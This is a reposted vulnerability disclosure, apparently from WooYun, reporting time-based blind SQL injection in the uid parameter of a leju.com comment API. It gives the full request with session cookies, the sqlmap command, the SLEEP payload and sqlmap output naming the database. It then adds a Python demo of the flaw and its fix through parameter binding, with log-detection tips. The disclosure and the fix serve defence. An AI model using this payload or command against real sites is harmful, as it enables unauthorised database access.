神刀安全网

Vulnerability title: SQL injection in a Sina Leju API endpoint

Vulnerability details

Disclosure status:

2016-04-23: Details reported to the vendor; awaiting vendor response
2016-04-24: Vendor confirmed the issue; details disclosed to the vendor only
2016-04-25: Vendor fixed the vulnerability and disclosed it voluntarily; details made public

Brief description:

SQL injection

Detailed description:

Injectable parameter: uid (the marker `*` in the request below is the sqlmap injection point)

Code:
GET /api/comment/getcomment?callback=jsonp_278cgunw7w6imyb&key=1dd7374509225e5abf1484a8d0965aef&unique_id=6129070685173370162&uid=2970574011* HTTP/1.1
Host: comment.leju.com
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Accept-Encoding: gzip, deflate, sdch
Host: comment.leju.com
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
Connection: keep-alive
Referer: http://hf.leju.com/news/2016-04-22/08186129070685173370162.shtml
Cookie: M_AUTH=bcf97a064686696b03c5be538b6759fe74a9086b; M_USER=eNpdj8GKAjEMhp%2BmXoQl7bRNcuhhdAoWtlWnncOcZGbcZXEfYNGn3ypeFAL%2FT%2FKFP1nF0xA6pxjBoAYpV7WRfZ%2Fa6J3wKFiLloS3gkhs8IU77PbJu2p8bMPn3eQxl1AX4QMkKcUAa6kNEUgGU%2Bchl13oOzfe%2BstYjtd4%2B0lDAR4vv9f4J5qu1gPL%2B6Hfeoeap7mZLdlGWQJr4YxoiSUa%2BUVSPdhNSJ1b9DJp1dAEM1dRcF4WAzzZbzSkeb4fF1L7%2Fmp5Bql%2F1hZEWg%3D%3D; M_KEY=YmNhNzljMjFZbW91WW1KekxtaHZkWE5sTG5OcGJtRXVZMjl0TG1OdVh6RTBOVGc0T0Rnek1EVT0yZGY4; M_INFO=%7B%22uid%22%3A%222970574011%22%2C%22username%22%3A%22%5Cu7528%5Cu62372970574011%22%2C%22isThird%22%3Atrue%2C%22phone%22%3A%22%22%2C%22headurl%22%3A%22http%3A%5C%2F%5C%2Fp4.sinaimg.cn%5C%2F2970574011%5C%2F180%22%2C%22iscard%22%3Afalse%7D; M_UID=2970574011; M_ITSOURCE=749ab3b68632680660d776891751e812; M_SPRING=YzRjYTQyMzhNUT09YjkyMw%3D%3D; M_TICKET=NGU5ZDc4Y2RZbW91WW1KekxtaHZkWE5sTG5OcGJtRXVZMjl0TG1OdVh6RTBOVGc0TURFNU1EVmZNamszTURVM05EQXhNUT09ZWE5Yw%3D%3D; pgv_pvi=1220687872; city=wh; wapparam=wap2web; citypub=wh; extern_host=hf.leju.com; gatheruuid=56f63df72a5ab810

Proof of vulnerability:

Code:
sqlmap -r 1.txt --dbms=mysql --current-db --technique=T

Code:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://comment.leju.com:80/api/comment/getcomment?callback=jsonp_278cgunw7w6imyb&key=1dd7374509225e5abf1484a8d0965aef&unique_id=6129070685173370162&uid=2970574011') AND (SELECT * FROM (SELECT(SLEEP(5)))sslJ) AND ('lITm'='lITm
---
[22:49:28] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[22:49:57] [INFO] confirming MySQL
[22:49:57] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[22:50:37] [INFO] adjusting time delay to 4 seconds due to good response times
[22:50:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[22:50:37] [INFO] fetching current database
[22:50:37] [INFO] retrieved: comment_leju_com
current database: 'comment_leju_com'
[23:09:23] [INFO] fetched data logged to text files under '/Users/null0z/.sqlmap/output/comment.leju.com'

Remediation:

~~~
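The remediation section above is empty, so here is an added example (not code from the original report or from leju.com) of the defect class and its fix. It uses an in-memory SQLite table as a stand-in for the comment database; the table and column names are assumptions. The reported uid payload is fed to a query built by string formatting, where the value is parsed as SQL (SQLite has no SLEEP(), so the engine rejects it by name, which proves the input reached the parser as code), and then to a parameterised query, where the same string is only ever compared as data. A final layer rejects anything that does not look like a numeric account id before the database is touched.

```python
import sqlite3

# Constructed sample data; the schema is an assumption, not leju.com's real one.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comment (id INTEGER PRIMARY KEY, uid TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO comment (uid, body) VALUES (?, ?)",
        [("2970574011", "first comment"), ("2970574011", "second comment"),
         ("1000000001", "someone else's comment")],
    )
    conn.commit()
    return conn

# The uid value exactly as sqlmap reported it on this page.
REPORTED_PAYLOAD = "2970574011') AND (SELECT * FROM (SELECT(SLEEP(5)))sslJ) AND ('lITm'='lITm"

def get_comments_vulnerable(conn, uid):
    """Defect: the request value is spliced into the statement text."""
    sql = f"SELECT id, body FROM comment WHERE (uid = '{uid}')"
    return conn.execute(sql).fetchall()

def get_comments_parameterized(conn, uid):
    """Fix, layer 1: the value is bound as a parameter and never parsed as SQL."""
    sql = "SELECT id, body FROM comment WHERE uid = ?"
    return conn.execute(sql, (uid,)).fetchall()

def get_comments_fixed(conn, uid):
    """Fix, layer 2: reject input that is not a decimal account id, then bind it."""
    if not (isinstance(uid, str) and uid.isdigit() and len(uid) <= 20):
        raise ValueError("uid must be a decimal account id")
    return get_comments_parameterized(conn, uid)

def injected_sql_reached_engine(conn, uid):
    """True when the vulnerable builder let uid change the statement:
    SQLite has no SLEEP(), so it refuses the statement by function name."""
    try:
        get_comments_vulnerable(conn, uid)
        return False
    except sqlite3.OperationalError as exc:
        return "SLEEP" in str(exc)

if __name__ == "__main__":
    conn = make_db()
    print("legitimate uid, vulnerable builder:", get_comments_vulnerable(conn, "2970574011"))
    print("payload parsed as SQL:", injected_sql_reached_engine(conn, REPORTED_PAYLOAD))
    print("payload under parameter binding:", get_comments_parameterized(conn, REPORTED_PAYLOAD))
    try:
        get_comments_fixed(conn, REPORTED_PAYLOAD)
    except ValueError as exc:
        print("payload rejected before the query:", exc)
```

The same request shape also suggests what to look for in the access logs of an endpoint like this: a uid value that is not purely numeric, or a cluster of requests to one endpoint whose response time jumps by a few seconds, is the signature of a time-based blind probe.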

Copyright notice: when reposting, credit the source: null_z@WooYun
